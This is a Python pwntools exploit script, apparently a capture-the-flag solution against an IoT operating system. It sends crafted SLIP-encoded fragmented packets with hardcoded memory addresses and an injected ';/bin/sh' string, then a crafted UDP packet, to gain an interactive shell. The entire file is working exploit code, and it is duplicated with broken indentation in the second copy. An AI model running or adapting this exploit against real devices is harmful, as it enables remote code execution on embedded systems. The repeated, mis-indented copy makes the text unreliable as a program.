YiChenChai/exploit.py

## exploit.py
from pwn import *
from slip import slip
# flag: flag{IoT_operating_system_down_wooo}
serv = server(60001)
proc = serv.next_connection()
sobj = slip()
e = sobj.encode
proc.send(e('!M' + '\x00' * 8))
first_frag  = '\x01' * 2 # Useless header
sz = 0x100
first_frag += p16(0xc000 ^ sz, endian='big')
first_frag += p16(0xbeef, endian='big')
first_frag += '\x05' * 0x20
pause()
proc.send(e(first_frag))
for i in range(6):
	frag  = '\x01' * 2 # Useless header
	frag += p16(0xe000 ^ sz, endian='big')
	frag += p16(0xbeef, endian='big')
	frag += chr(i + 1)
	if i != 5: frag += '\x00' * 0x20
	else: frag += '\x07' * 8 + p32(0x804f1b0) + '\x07\x07' + '\x01\x01' + ';/bin/sh\x00'.ljust(0x13, '\x07')
	proc.send(e(frag))

frag  = '\x01' * 2 # Useless header
frag += p16(0xe000 ^ sz, endian='big')
frag += p16(0xbeef, endian='big')
frag += '\xa8'
frag += '\x00' * 0x10
frag += p16(0x1337) + p16(0xded) + p32(0)
frag += p32(0x8077858)
frag += '\x03' * 4
pause()
proc.send(e(frag))
final_frag  = '\x01' * 2 # Useless header
final_frag += p16(0xe000 ^ sz, endian='big')
final_frag += p16(0xbeef, endian='big')
final_frag += '\x07'
final_frag += '\x05' * 0x20
pause()
proc.send(e(final_frag))
# proc.send(sobj.encode('M' + '\x00' * 8))
udp_pkt  = '\x01' * 2
udp_pkt += '\x41'
udp_pkt += '\x60'
udp_pkt += '\xff\xff\xff'
udp_sz = 0x20
udp_pkt += p16(udp_sz, endian='big')
udp_pkt += '\x11' + 17 * '\x05'
udp_pkt += '\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00'
udp_pkt += p16(0xded)
udp_pkt += p16(0x1337)
udp_pkt += '\x05' * 2
udp_pkt += '\x00\x00'
udp_pkt += '\x05' * 0x10
proc.send(e(udp_pkt))
proc.interactive()
	from pwn import *
	from slip import slip
	# flag: flag{IoT_operating_system_down_wooo}
	serv = server(60001)
	proc = serv.next_connection()
	sobj = slip()
	e = sobj.encode
	proc.send(e('!M' + '\x00' * 8))
	first_frag = '\x01' * 2 # Useless header
	sz = 0x100
	first_frag += p16(0xc000 ^ sz, endian='big')
	first_frag += p16(0xbeef, endian='big')
	first_frag += '\x05' * 0x20
	pause()
	proc.send(e(first_frag))
	for i in range(6):
	frag = '\x01' * 2 # Useless header
	frag += p16(0xe000 ^ sz, endian='big')
	frag += p16(0xbeef, endian='big')
	frag += chr(i + 1)
	if i != 5: frag += '\x00' * 0x20
	else: frag += '\x07' * 8 + p32(0x804f1b0) + '\x07\x07' + '\x01\x01' + ';/bin/sh\x00'.ljust(0x13, '\x07')
	proc.send(e(frag))

	frag = '\x01' * 2 # Useless header
	frag += p16(0xe000 ^ sz, endian='big')
	frag += p16(0xbeef, endian='big')
	frag += '\xa8'
	frag += '\x00' * 0x10
	frag += p16(0x1337) + p16(0xded) + p32(0)
	frag += p32(0x8077858)
	frag += '\x03' * 4
	pause()
	proc.send(e(frag))
	final_frag = '\x01' * 2 # Useless header
	final_frag += p16(0xe000 ^ sz, endian='big')
	final_frag += p16(0xbeef, endian='big')
	final_frag += '\x07'
	final_frag += '\x05' * 0x20
	pause()
	proc.send(e(final_frag))
	# proc.send(sobj.encode('M' + '\x00' * 8))
	udp_pkt = '\x01' * 2
	udp_pkt += '\x41'
	udp_pkt += '\x60'
	udp_pkt += '\xff\xff\xff'
	udp_sz = 0x20
	udp_pkt += p16(udp_sz, endian='big')
	udp_pkt += '\x11' + 17 * '\x05'
	udp_pkt += '\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00'
	udp_pkt += p16(0xded)
	udp_pkt += p16(0x1337)
	udp_pkt += '\x05' * 2
	udp_pkt += '\x00\x00'
	udp_pkt += '\x05' * 0x10
	proc.send(e(udp_pkt))
	proc.interactive()